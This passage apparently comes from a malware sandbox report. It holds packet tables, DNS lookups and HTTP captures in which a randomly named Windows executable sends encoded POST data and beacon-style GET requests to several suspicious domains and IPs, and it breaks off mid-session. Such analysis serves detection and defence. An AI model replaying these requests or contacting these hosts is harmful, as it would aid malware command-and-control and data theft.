Jan 10, 2025 18:38:30.790194988 CET	80	49978	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:32.290669918 CET	49978	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:32.296365976 CET	80	49978	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:32.296478987 CET	49978	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:33.309617996 CET	49979	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:33.315260887 CET	80	49979	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:33.315382004 CET	49979	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:33.325097084 CET	49979	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:33.329921007 CET	80	49979	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:34.888339043 CET	80	49979	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:34.888416052 CET	80	49979	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:34.888569117 CET	49979	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:34.891338110 CET	49979	80	192.168.2.9	47.83.1.90
Jan 10, 2025 18:38:34.896127939 CET	80	49979	47.83.1.90	192.168.2.9
Jan 10, 2025 18:38:42.978892088 CET	49980	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:42.983738899 CET	80	49980	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:42.983966112 CET	49980	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:42.999316931 CET	49980	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:43.004190922 CET	80	49980	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:44.376663923 CET	80	49980	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:44.376822948 CET	80	49980	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:44.376887083 CET	49980	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:44.510760069 CET	49980	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:45.528455019 CET	49981	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:45.533752918 CET	80	49981	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:45.538953066 CET	49981	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:45.554025888 CET	49981	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:45.559082985 CET	80	49981	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:46.936598063 CET	80	49981	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:46.936693907 CET	80	49981	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:46.936777115 CET	49981	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:47.057226896 CET	49981	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:48.075191021 CET	49982	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:48.080090046 CET	80	49982	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:48.080205917 CET	49982	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:48.095185995 CET	49982	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:48.100095987 CET	80	49982	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:48.100261927 CET	80	49982	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:49.490133047 CET	80	49982	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:49.490256071 CET	80	49982	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:49.490309954 CET	49982	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:49.603137016 CET	49982	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:50.621891975 CET	49983	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:50.626873970 CET	80	49983	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:50.627000093 CET	49983	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:50.636682987 CET	49983	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:50.641577005 CET	80	49983	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:52.040771008 CET	80	49983	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:52.040813923 CET	80	49983	18.143.155.63	192.168.2.9
Jan 10, 2025 18:38:52.041014910 CET	49983	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:52.043584108 CET	49983	80	192.168.2.9	18.143.155.63
Jan 10, 2025 18:38:52.048405886 CET	80	49983	18.143.155.63	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:38:09.275000095 CET	60080	53	192.168.2.9	1.1.1.1
Jan 10, 2025 18:38:09.668299913 CET	53	60080	1.1.1.1	192.168.2.9
Jan 10, 2025 18:38:25.639326096 CET	54022	53	192.168.2.9	1.1.1.1
Jan 10, 2025 18:38:25.657883883 CET	53	54022	1.1.1.1	192.168.2.9
Jan 10, 2025 18:38:39.903359890 CET	53498	53	192.168.2.9	1.1.1.1
Jan 10, 2025 18:38:40.906764030 CET	53498	53	192.168.2.9	1.1.1.1
Jan 10, 2025 18:38:41.899971962 CET	53498	53	192.168.2.9	1.1.1.1
Jan 10, 2025 18:38:42.975770950 CET	53	53498	1.1.1.1	192.168.2.9
Jan 10, 2025 18:38:42.975789070 CET	53	53498	1.1.1.1	192.168.2.9
Jan 10, 2025 18:38:42.975800037 CET	53	53498	1.1.1.1	192.168.2.9
Jan 10, 2025 18:38:57.466312885 CET	50838	53	192.168.2.9	1.1.1.1
Jan 10, 2025 18:38:57.479525089 CET	53	50838	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 18:38:09.275000095 CET	192.168.2.9	1.1.1.1	0xa4ef	Standard query (0)	www.wuyyv4tq.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:25.639326096 CET	192.168.2.9	1.1.1.1	0xcb38	Standard query (0)	www.cloijz.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:39.903359890 CET	192.168.2.9	1.1.1.1	0xb058	Standard query (0)	www.xinchaocjcela.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:40.906764030 CET	192.168.2.9	1.1.1.1	0xb058	Standard query (0)	www.xinchaocjcela.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:41.899971962 CET	192.168.2.9	1.1.1.1	0xb058	Standard query (0)	www.xinchaocjcela.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:57.466312885 CET	192.168.2.9	1.1.1.1	0xeb7a	Standard query (0)	www.grimbo.boats	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 18:38:09.668299913 CET	1.1.1.1	192.168.2.9	0xa4ef	No error (0)	www.wuyyv4tq.top	156.226.63.13	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:25.657883883 CET	1.1.1.1	192.168.2.9	0xcb38	No error (0)	www.cloijz.info	47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:42.975770950 CET	1.1.1.1	192.168.2.9	0xb058	No error (0)	www.xinchaocjcela.net	18.143.155.63	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:42.975789070 CET	1.1.1.1	192.168.2.9	0xb058	No error (0)	www.xinchaocjcela.net	18.143.155.63	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:42.975800037 CET	1.1.1.1	192.168.2.9	0xb058	No error (0)	www.xinchaocjcela.net	18.143.155.63	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:57.479525089 CET	1.1.1.1	192.168.2.9	0xeb7a	No error (0)	www.grimbo.boats	104.21.18.171	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:57.479525089 CET	1.1.1.1	192.168.2.9	0xeb7a	No error (0)	www.grimbo.boats	172.67.182.198	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.wuyyv4tq.top

www.cloijz.info

www.xinchaocjcela.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49975	156.226.63.13	80	6948	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:38:09.690763950 CET	383	OUT	GET /30sl/?oLbh=Z4SLXZCPeLcly&vlKLavJp=Y8m72M9itisBKHCuJygfmdA87gCGNftSw12cMpbnF1u6Xw97jV7YOpeEW7zuXiNJMD7NgZYDN5Q2P1YDh66t+LWy3lELjPgtDlmd7njEJtKsP2gRrQ== HTTP/1.1 Host: www.wuyyv4tq.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Jan 10, 2025 18:38:10.583400965 CET	289	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 10 Jan 2025 17:38:10 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49976	47.83.1.90	80	6948	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:38:25.687381983 CET	637	OUT	POST /r4db/ HTTP/1.1 Host: www.cloijz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 197 Origin: http://www.cloijz.info Referer: http://www.cloijz.info/r4db/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 76 6c 4b 4c 61 76 4a 70 3d 49 53 58 78 53 50 74 31 7a 75 4f 56 50 67 6c 47 64 4e 57 46 51 63 52 32 48 51 61 76 72 66 61 78 2f 4b 69 7a 76 62 45 6b 74 71 47 55 32 6b 56 49 78 62 36 72 67 37 35 55 67 4e 36 6f 56 6a 6d 66 70 70 47 47 4b 31 64 49 35 45 44 6b 4c 44 33 59 71 6b 33 73 4e 77 42 33 2f 69 39 34 6e 50 56 64 77 76 42 54 58 69 39 48 4e 41 39 6f 5a 2b 36 4c 59 37 30 6c 6f 37 31 7a 71 73 4f 2f 59 33 69 75 62 4d 72 55 32 48 34 6e 2b 74 4e 54 41 46 63 47 52 66 66 39 4e 79 50 64 62 34 2f 68 78 43 64 32 66 79 4c 42 56 46 33 55 2f 47 49 38 4f 68 70 58 68 57 6a 74 45 76 77 6c 50 49 37 54 Data Ascii: vlKLavJp=ISXxSPt1zuOVPglGdNWFQcR2HQavrfax/KizvbEktqGU2kVIxb6rg75UgN6oVjmfppGGK1dI5EDkLD3Yqk3sNwB3/i94nPVdwvBTXi9HNA9oZ+6LY70lo71zqsO/Y3iubMrU2H4n+tNTAFcGRff9NyPdb4/hxCd2fyLBVF3U/GI8OhpXhWjtEvwlPI7T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49977	47.83.1.90	80	6948	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:38:28.236618042 CET	661	OUT	POST /r4db/ HTTP/1.1 Host: www.cloijz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Origin: http://www.cloijz.info Referer: http://www.cloijz.info/r4db/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 76 6c 4b 4c 61 76 4a 70 3d 49 53 58 78 53 50 74 31 7a 75 4f 56 41 68 31 47 66 73 57 46 58 38 52 35 4c 77 61 76 6b 2f 61 31 2f 4b 75 7a 76 5a 6f 30 74 34 69 55 33 47 39 49 6a 76 57 72 6a 37 35 55 34 39 36 6e 4e 44 6d 55 70 70 37 37 4b 78 42 49 35 45 48 6b 4c 44 6e 59 71 79 2f 76 4e 67 42 31 32 43 39 2b 36 66 56 64 77 76 42 54 58 69 42 74 4e 45 5a 6f 59 4c 71 4c 62 61 30 69 68 62 31 30 69 4d 4f 2f 63 33 69 71 62 4d 71 78 32 44 35 49 2b 75 35 54 41 46 4d 47 52 4f 66 38 48 79 50 54 57 59 2b 4b 37 69 59 41 47 46 50 4f 64 58 54 4e 67 6e 30 69 4e 41 56 4a 77 6b 71 32 52 34 77 43 49 76 79 37 6d 7a 53 62 4e 57 33 55 78 6c 46 34 75 4b 6e 31 73 78 53 37 76 41 3d 3d Data Ascii: vlKLavJp=ISXxSPt1zuOVAh1GfsWFX8R5Lwavk/a1/KuzvZo0t4iU3G9IjvWrj75U496nNDmUpp77KxBI5EHkLDnYqy/vNgB12C9+6fVdwvBTXiBtNEZoYLqLba0ihb10iMO/c3iqbMqx2D5I+u5TAFMGROf8HyPTWY+K7iYAGFPOdXTNgn0iNAVJwkq2R4wCIvy7mzSbNW3UxlF4uKn1sxS7vA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49978	47.83.1.90	80	6948	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:38:30.785191059 CET	1674	OUT	POST /r4db/ HTTP/1.1 Host: www.cloijz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Origin: http://www.cloijz.info Referer: http://www.cloijz.info/r4db/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 76 6c 4b 4c 61 76 4a 70 3d 49 53 58 78 53 50 74 31 7a 75 4f 56 41 68 31 47 66 73 57 46 58 38 52 35 4c 77 61 76 6b 2f 61 31 2f 4b 75 7a 76 5a 6f 30 74 34 71 55 33 33 64 49 78 2b 57 72 69 37 35 55 6d 4e 36 6b 4e 44 6d 4e 70 70 6a 2f 4b 32 4a 2b 35 43 62 6b 45 41 2f 59 37 77 58 76 65 41 42 31 37 69 39 37 6e 50 56 79 77 76 52 58 58 69 78 74 4e 45 5a 6f 59 4b 61 4c 4d 62 30 69 6a 62 31 7a 71 73 50 77 59 33 69 53 62 4e 44 4d 32 44 39 69 39 64 68 54 41 68 51 47 55 38 6e 38 4c 79 50 52 59 34 2b 53 37 6a 6b 54 47 46 37 4b 64 53 48 33 67 6b 6b 69 4f 78 67 46 72 32 57 70 41 4c 4d 66 4b 65 43 5a 2f 48 4b 2f 4e 6d 79 33 74 33 35 6b 33 66 47 33 68 77 6a 71 79 78 4f 37 31 4d 33 70 56 74 45 49 43 4d 69 35 48 47 53 59 51 6e 79 70 41 79 33 35 69 73 54 67 77 6c 47 6b 30 76 70 61 36 74 64 2f 6e 68 37 75 61 62 4c 4e 31 33 6b 37 35 6d 47 49 4b 4f 6e 70 78 7a 61 44 33 39 70 46 79 77 59 49 58 68 63 6f 6d 6e 69 67 62 33 4b 71 57 2b 55 50 69 53 36 7a 34 58 54 61 45 56 67 53 6a 30 74 56 73 74 6f 75 34 44 70 44 53 41 68 74 63 [TRUNCATED] Data Ascii: vlKLavJp=ISXxSPt1zuOVAh1GfsWFX8R5Lwavk/a1/KuzvZo0t4qU33dIx+Wri75UmN6kNDmNppj/K2J+5CbkEA/Y7wXveAB17i97nPVywvRXXixtNEZoYKaLMb0ijb1zqsPwY3iSbNDM2D9i9dhTAhQGU8n8LyPRY4+S7jkTGF7KdSH3gkkiOxgFr2WpALMfKeCZ/HK/Nmy3t35k3fG3hwjqyxO71M3pVtEICMi5HGSYQnypAy35isTgwlGk0vpa6td/nh7uabLN13k75mGIKOnpxzaD39pFywYIXhcomnigb3KqW+UPiS6z4XTaEVgSj0tVstou4DpDSAhtclG6zPd1RXvmTwJM44mfrLmuAtw5w5+SIVdcs++226r4fK8QUQOkIH/lEAzbf0mWmlOQn5O6sFua6nmqphUNE7gYGiiKk9Ztk8YBNy4bpj+PWgEaMsJFcUjD7NMJD55zrxJ4p4dFLRhkRwt1tQyxqUkIV6r6EUihRZiiTgsZXo7Ojn7Dl6ZXF/qKLafyLHQOC8jtN6lrV27uLoQNQHh7L8Kg1ooZ9Dmb9+IaxEFwz0z11N11QHiD4KOjoqnGRDM0jvDW028yDL/IHrdqUG1lSorBflFBvEU+jcxrFBudzBPAtXio7SxfdxHJidMNQFfZefOM7thJqat7FzUCMW0Di3ymFVn26bjnzmHC5/EK+b6/kMa4fDAGSKdtwxEjMyT/pucDPJsx59jlE7b2tMqgn4CS1BL1EY40N3An0LZomT8wC8k3TE7WeavoEkO1uA63SXZoPBRYJNaKpBqlYu7StUa/zmzpnFJmh89+W6rAb/sSQC0+YrF8hh5T1YUYd+bqT8B1Kb+ZdHQg2eAjNsBfdF4K3Ud9aSt1zwCoX2VCoPetO5pOzZkMYpuaFVwTgwDFlw4RfnUURqkft/CIJ4hpiNREo2ZsslYC3Sgi7LtTjiMjIZMwqpf+8rWJDrIwsj1GtIrW4Txnuqy8ZrvrlrUDIlFqfTtP93hsgXR [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49979	47.83.1.90	80	6948	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:38:33.325097084 CET	382	OUT	GET /r4db/?vlKLavJp=FQ/RR5Jd24eUARJyGPuMKqZXezSzu6XwjK+Oq7ZF4qPw6Wtsm8nU8fJ2hbzCFTyWuYbuF1JB0V7UBnva6FDpHAtCoiRayvgo5qh3BGhuPHZLV4qkZw==&oLbh=Z4SLXZCPeLcly HTTP/1.1 Host: www.cloijz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Jan 10, 2025 18:38:34.888339043 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 17:38:34 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49980	18.143.155.63	80	6948	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:38:42.999316931 CET	655	OUT	POST /uw0r/ HTTP/1.1 Host: www.xinchaocjcela.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 197 Origin: http://www.xinchaocjcela.net Referer: http://www.xinchaocjcela.net/uw0r/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 76 6c 4b 4c 61 76 4a 70 3d 71 4e 73 6f 42 79 44 43 72 78 32 79 52 67 73 2f 51 6e 75 2b 70 39 55 64 44 39 48 4e 37 77 57 34 39 53 73 6c 46 4d 52 61 30 74 33 2f 79 52 61 53 31 4d 5a 4d 2f 42 6f 50 68 53 47 57 4b 33 4c 56 75 42 64 51 38 37 37 43 73 75 5a 77 31 76 33 70 63 46 4b 78 46 59 6d 4c 6d 64 37 71 49 4c 59 43 48 2f 37 75 6e 57 61 35 6d 67 4a 7a 31 64 4f 79 66 37 4e 69 63 65 47 69 45 55 4c 49 50 68 70 2f 69 75 47 4c 6d 79 35 70 42 6a 4c 67 2b 78 31 58 36 38 47 36 51 66 55 38 54 4f 6a 76 33 42 66 33 75 70 48 31 77 5a 61 62 59 33 4d 36 34 6e 47 72 76 43 72 4f 68 32 4e 4b 56 4f 4d 70 Data Ascii: vlKLavJp=qNsoByDCrx2yRgs/Qnu+p9UdD9HN7wW49SslFMRa0t3/yRaS1MZM/BoPhSGWK3LVuBdQ877CsuZw1v3pcFKxFYmLmd7qILYCH/7unWa5mgJz1dOyf7NiceGiEULIPhp/iuGLmy5pBjLg+x1X68G6QfU8TOjv3Bf3upH1wZabY3M64nGrvCrOh2NKVOMp
Jan 10, 2025 18:38:44.376663923 CET	732	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 17:38:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=; path=/; domain=.www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=; path=/; domain=www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=862ae6130edbe8d251b4655d21f58ed7\|8.46.123.189\|1736530724\|1736530724\|0\|1\|0; path=/; domain=.xinchaocjcela.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49981	18.143.155.63	80	6948	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:38:45.554025888 CET	679	OUT	POST /uw0r/ HTTP/1.1 Host: www.xinchaocjcela.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Origin: http://www.xinchaocjcela.net Referer: http://www.xinchaocjcela.net/uw0r/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 76 6c 4b 4c 61 76 4a 70 3d 71 4e 73 6f 42 79 44 43 72 78 32 79 51 44 30 2f 57 41 36 2b 6f 64 55 65 47 39 48 4e 69 67 57 38 39 56 6b 6c 46 4e 55 42 30 59 6e 2f 78 77 4b 53 30 4e 5a 4d 71 42 6f 50 72 79 48 63 4f 33 4c 43 75 42 42 59 38 2f 7a 43 73 74 6c 77 31 71 4c 70 63 57 69 32 45 49 6d 4e 2f 4e 37 30 56 37 59 43 48 2f 37 75 6e 58 2b 48 6d 67 52 7a 79 75 57 79 65 61 4e 68 56 2b 47 68 4a 45 4c 49 65 78 70 37 69 75 47 35 6d 7a 55 45 42 68 6a 67 2b 77 6c 58 36 4a 79 35 4c 50 55 36 63 75 69 52 7a 44 76 79 70 76 6e 7a 2f 4a 61 78 42 56 55 6f 79 6d 36 31 2b 77 69 56 30 68 4e 74 53 70 46 42 61 51 4c 58 7a 6e 58 59 47 36 46 52 4c 50 56 6d 6c 45 71 42 49 77 3d 3d Data Ascii: vlKLavJp=qNsoByDCrx2yQD0/WA6+odUeG9HNigW89VklFNUB0Yn/xwKS0NZMqBoPryHcO3LCuBBY8/zCstlw1qLpcWi2EImN/N70V7YCH/7unX+HmgRzyuWyeaNhV+GhJELIexp7iuG5mzUEBhjg+wlX6Jy5LPU6cuiRzDvypvnz/JaxBVUoym61+wiV0hNtSpFBaQLXznXYG6FRLPVmlEqBIw==
Jan 10, 2025 18:38:46.936598063 CET	732	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 17:38:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=; path=/; domain=.www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=; path=/; domain=www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=ee9626137327fcb64d14e61aa9f811ff\|8.46.123.189\|1736530726\|1736530726\|0\|1\|0; path=/; domain=.xinchaocjcela.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49982	18.143.155.63	80	6948	C:\Program Files (x86)\gevCbDyYnXgYtEzLyLhuPUcTBXfyfguEqaJoddFSCueXARC\iiYhUrEPyAr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:38:48.095185995 CET	1692	OUT	POST /uw0r/ HTTP/1.1 Host: www.xinchaocjcela.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1233 Origin: http://www.xinchaocjcela.net Referer: http://www.xinchaocjcela.net/uw0r/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 76 6c 4b 4c 61 76 4a 70 3d 71 4e 73 6f 42 79 44 43 72 78 32 79 51 44 30 2f 57 41 36 2b 6f 64 55 65 47 39 48 4e 69 67 57 38 39 56 6b 6c 46 4e 55 42 30 62 48 2f 79 41 57 53 79 75 42 4d 34 78 6f 50 31 69 48 66 4f 33 4c 36 75 42 4a 63 38 2f 2b 39 73 6f 68 77 31 50 48 70 49 33 69 32 50 49 6d 4e 69 64 37 31 49 4c 59 74 48 2f 72 71 6e 57 4f 48 6d 67 52 7a 79 70 75 79 59 4c 4e 68 54 2b 47 69 45 55 4c 55 50 68 70 54 69 74 33 4f 6d 7a 52 35 42 51 44 67 2b 51 56 58 34 62 71 35 57 66 55 34 5a 75 69 5a 7a 44 69 69 70 75 50 2f 2f 4b 47 62 42 57 30 6f 7a 42 58 49 38 41 2b 52 70 58 51 5a 64 36 6c 42 59 6d 50 75 36 55 75 76 52 76 64 77 56 64 34 48 77 41 48 7a 57 36 41 5a 36 64 4b 2f 49 6b 67 51 6f 46 52 45 43 4c 2f 33 4b 47 6d 67 7a 72 6f 75 4d 30 52 6a 69 30 5a 66 59 51 63 70 49 6d 38 59 2f 41 6d 42 43 69 4f 31 65 42 2f 74 4a 5a 32 46 43 6b 56 71 35 42 4b 44 6a 45 35 69 50 61 53 39 69 54 47 56 59 5a 38 76 7a 49 67 6a 75 34 4e 42 5a 54 70 41 52 4d 61 64 76 61 76 54 48 35 6a 48 32 44 4b 31 6f 64 6b 5a 46 46 51 72 2f [TRUNCATED] Data Ascii: 